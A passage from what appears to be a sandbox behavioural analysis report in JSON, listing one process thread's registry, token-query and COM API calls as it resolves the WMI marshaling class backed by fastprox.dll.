                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 856
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 857
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "TreatAs"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 858
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 859
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": "ActivateOnHostFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags"
              }
            ],
            "repeated": 0,
            "id": 860
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 861
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 862
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "InprocServer32"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 863
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": "InprocServer32"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 864
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 865
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "%systemroot%\\system32\\wbem\\fastprox.dll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)"
              }
            ],
            "repeated": 1,
            "id": 866
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": "ThreadingModel"
              },
              {
                "name": "Data",
                "value": "Both"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel"
              }
            ],
            "repeated": 0,
            "id": 867
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 868
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 869
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 870
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe0j\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0k\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 871
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32"
              }
            ],
            "repeated": 0,
            "id": 872
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 873
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "InprocHandler32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32"
              }
            ],
            "repeated": 0,
            "id": 874
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 875
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 876
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xe0j\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0k\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 877
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler"
              }
            ],
            "repeated": 0,
            "id": 878
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 879
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "InprocHandler"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler"
              }
            ],
            "repeated": 0,
            "id": 880
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "LocalServer32"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer32"
              }
            ],
            "repeated": 0,
            "id": 881
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": "AppID"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID"
              }
            ],
            "repeated": 0,
            "id": 882
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 883
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 884
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": " j\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00 k\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 885
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer"
              }
            ],
            "repeated": 0,
            "id": 886
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 887
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "LocalServer"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\LocalServer"
              }
            ],
            "repeated": 0,
            "id": 888
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c6"
              },
              {
                "name": "SubKey",
                "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              }
            ],
            "repeated": 0,
            "id": 889
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037a"
              },
              {
                "name": "SubKey",
                "value": "Elevation"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\Elevation"
              }
            ],
            "repeated": 0,
            "id": 890
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 891
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              }
            ],
            "repeated": 0,
            "id": 892
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c2"
              },
              {
                "name": "SubKey",
                "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              }
            ],
            "repeated": 0,
            "id": 893
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "TreatAs"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 894
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              }
            ],
            "repeated": 0,
            "id": 895
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 896
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002d8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 897
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 898
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 899
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002d8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 900
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 901
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 902
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000033c"
              },
              {
